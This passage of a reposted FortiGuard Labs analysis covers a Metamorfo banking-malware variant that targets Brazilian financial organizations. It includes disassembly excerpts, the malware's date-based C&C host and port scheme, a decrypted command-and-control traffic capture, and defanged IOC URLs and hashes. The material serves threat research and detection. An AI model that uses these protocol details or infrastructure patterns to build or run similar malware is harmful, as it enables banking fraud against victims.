New Roman', serif; color: black; background: #D9D9D9;\">00525EFA mov 
&nbsp;eax, [ebp+var_1C0] <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">;&rdquo;Bank URL&rdquo;<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525F00 mov &nbsp;edx, [ebp+var_4] <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; topmost window title<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525F03 <strong>call string_match<\/strong> <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525F08 test eax, eax<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525F0A jle &nbsp;short loc_525F69<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">[&#8230;]<\/span><\/em><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As mentioned before, those matching strings are encrypted, but they are decrypted before being used in string_match(). 
Once any of the strings is matched, Metamorfo records the financial organization\u2019s name in a global variable and then connects to its C&amp;C server to report which match was triggered and to receive control commands. If none of the string matches is triggered, Metamorfo does nothing but keeps checking with Timer1 every 500 ms.<\/p>\n<h2>Host and Port of C&amp;C Server<\/h2>\n<p>To make blocking harder, the C&amp;C host name is generated dynamically in a special way, so that the host string changes each time. There is a function dedicated to this task.<\/p>\n<p>Here is an example of a host string: \u201cssqld12g1744gu.dynu.com\u201d. The last part, \u201c.dynu.com\u201d, is fixed. The first part is itself a combination of three substrings: \u201cssq1d\u201d, \u201c12\u201d and \u201cg17744gu\u201d. \u201c12\u201d is the number of the current month: \u201c12\u201d for December, \u201c01\u201d for January, \u201c02\u201d for February and so on. The other two substrings are constants. There are a total of 620 constant strings, which can generate 620 host strings; they are split into 31 groups, one for every day of the month, so each day has 20 strings, and the function randomly picks one of them.<\/p>\n<p>All of these constant strings are stored encrypted and are only decrypted just before use.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_1777650826.img.png\/1578615680077\/metamorfo-eight.png\" alt=\"Figure 8. Partial set of decrypted host strings for December\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 8. 
Partial set of decrypted host strings for December<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 8 shows the decrypted host strings for December: 31 lines, one for each day, with 20 comma-separated host strings on each line. For other months, the \u201c12\u201d in the middle changes to the corresponding month number.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_520795363.img.png\/1578615717979\/metamorfo-nine.png\" alt=\"Figure 9. All decrypted ports of C&amp;C server\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 9. All decrypted ports of C&amp;C server<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Using the same scheme, it has 310 ports, 10 for each day. A separate function randomly picks a port from the 10 ports assigned to the current day number (1-31). Figure 9 shows all of those decrypted ports.<\/p>\n<h2>Command and Control with C&amp;C Server<\/h2>\n<p>On my test machine, I opened the web page of a listed Brazilian financial organization to trigger a string match in Timer1. It then connected to the C&amp;C server and relayed the information that a financial organization connection had been detected. I captured that encrypted communication traffic and decrypted it. 
The results are listed below:<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #7f0000; background: #FBEDED;\">[&lt;&lt;MANDASOCKET&gt;&gt;]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">&lt;|OK|&gt;<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">&lt;|Socket-Principal|&gt;6294954&lt;&lt;|<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #7f0000; background: #FBEDED;\">&lt;|Info|&gt;8974&lt;|&gt; <em>Bank Name<\/em> &lt;|&gt;****-PC V.8 &lt;|&gt;Windows 7 Ultimate&lt;|&gt;&lt;&lt;|<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-PING-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-PING-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-PING-]<\/span><\/p>\n<p 
style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-VIDEO-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #7f0000; background: #FBEDED;\">[-PONG-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-PING-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #7f0000; background: #FBEDED;\">[-PONG-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-PING-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #7f0000; background: #FBEDED;\">[-PONG-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-PING-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-REINICIAR-OS-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: 
Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #7f0000; background: #FBEDED;\">[-PONG-]<\/span><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>When the connection is established, the client sends \u201c[&lt;&lt;MANDASOCKET&gt;&gt;]\u201d first, and the server replies \u201c&lt;|OK|&gt;\u201d, which asks for information about what happened on the victim\u2019s device. An \u201c&lt;|Info|&gt;\u201d packet is then sent out containing the port number (8974), the name of the financial organization (shown as &quot;Bank Name&quot; above), the victim\u2019s computer name (****-PC), the client version (V.8) and the victim\u2019s OS name (Windows 7 Ultimate). NOTE: \u201c&lt;|&gt;\u201d is a field delimiter, while \u201c&lt;&lt;|\u201d is an end-of-message marker.<\/p>\n<p>In the Metamorfo client there is a function called Conn1Read(), a function belonging to the Conn1 socket, which processes the control commands from the C&amp;C server on this main socket. Figure 10 is a debugger screenshot taken when Metamorfo is about to encrypt the &lt;|Info|&gt; packet.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_170589532.img.png\/1578615994901\/metamorfo-ten.png\" alt=\"Figure 10. In &lt;|OK|&gt; command branch, it is about to encrypt &lt;|Info|&gt; packet\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 10. 
In &lt;|OK|&gt; command branch, it is about to encrypt &lt;|Info|&gt; packet<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As you can see from the traffic above, there are many other commands, like &quot;[-PING-]&quot;, &quot;[-PONG-]&quot;, &quot;[-VIDEO-]&quot; and so on. Going through the function Conn1Read(), I obtained all of the control commands and the purpose of each command.<\/p>\n<p>The following table lists most of the control commands for the main socket and their descriptions.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image.img.png\/1578616527727\/metamorfo-table-one.png\" alt>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_1854141351.img.png\/1578616531190\/metamorfo-table-two.png\" alt>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Conn2Read() is a function of the Conn2 socket that receives and processes control commands from the C&amp;C server. The Conn2 socket is started when the command \u201c<b>[-VIDEO-]<\/b>\u201d is received in Conn1Read(). 
The table below shows its commands and descriptions:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_112222180.img.png\/1578616612754\/metamorfo-table-three.png\" alt>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Solution<\/h2>\n<p>If you are a customer of a targeted Brazilian financial organization and you never run their applications or open one of their web pages on an infected computer, this variant of Metamorfo will not collect information.<\/p>\n<p>The two download URLs are rated as \u201c<b>Malicious Websites<\/b>\u201d by the FortiGuard Web Filtering service.<\/p>\n<p>Both of the MSI files are detected and blocked by the FortiGuard Antivirus service.<\/p>\n<h2>IOCs:<\/h2>\n<p><b>URLs<\/b><\/p>\n<p>hxxps[:]\/\/is[.]gd\/vphbra?YTOMHZO3IYSYBGB86SYFIT\/862023\/YTOMHZO3IYSYBGB86SYFIT<\/p>\n<p>hxxps[:]\/\/raw[.]githubusercontent[.]com\/edx23\/X435\/master\/img.zip<\/p>\n<p><b>Sample SHA-256<\/b><\/p>\n<p>[XlsPlan_Visualize.msi]<\/p>\n<p>631F6664876C1BD02BE60A8AF9A44030307E0FFA2C1239A95559559EDD0481D3<\/p>\n<p>[img.jpg or KJFLDKRE.msi]<\/p>\n<p>1A37AC4498AE3071DE271970E992968505BE95177FBB5BE2A3DA33A3A1514CEC<\/p>\n<p><i>Learn how\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">FortiGuard Labs<\/a>\u00a0provides\u00a0unmatched security and intelligence services using integrated\u00a0<a 
href=\"https:\/\/twitter.com\/hashtag\/AI?src=hashtag_click\">AI<\/a>\u00a0systems.\u00a0<\/i><\/p>\n<p><i>Find out about the FortiGuard Security Services\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions.html?utm_source=blog&amp;utm_campaign=2018-blog-security-services\">portfolio<\/a>\u00a0and s<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">ign up<\/a>\u00a0for our weekly FortiGuard Threat Brief.\u00a0<\/i><\/p>\n<p><i>Discover how\u00a0the FortiGuard\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions\/security-rating.html?utm_source=blog&amp;utm_campaign=2018-blog-security-rating-service\">Security Rating Service<\/a>\u00a0provides\u00a0security audits and best practices to guide customers in designing, implementing, and maintaining the security posture best suited for their organization.<\/i><\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p><a href=\"http:\/\/feedproxy.google.com\/~r\/fortinet\/blog\/threat-research\/~3\/FnAUGO2Q5c4\/analysis-metamorfo-variant-targets-financial-organizations.html\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_1866256683.img.png\/1579115666486\/email-content1-copy.png\"\/><br \/>Read about a new variant of the Metamorfo malware targeting Brazilian financial organizations, in this analysis from FortiGuard Labs.&lt;img src=&#8221;http:\/\/feeds.feedburner.com\/~r\/fortinet\/blog\/threat-research\/~4\/FnAUGO2Q5c4&#8243; 
height=&#8221;1&#8243; width=&#8221;1&#8243; alt=&#8221;&#8221;\/&gt;<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-17455","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/17455","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=17455"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/17455\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=17455"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=17455"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=17455"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}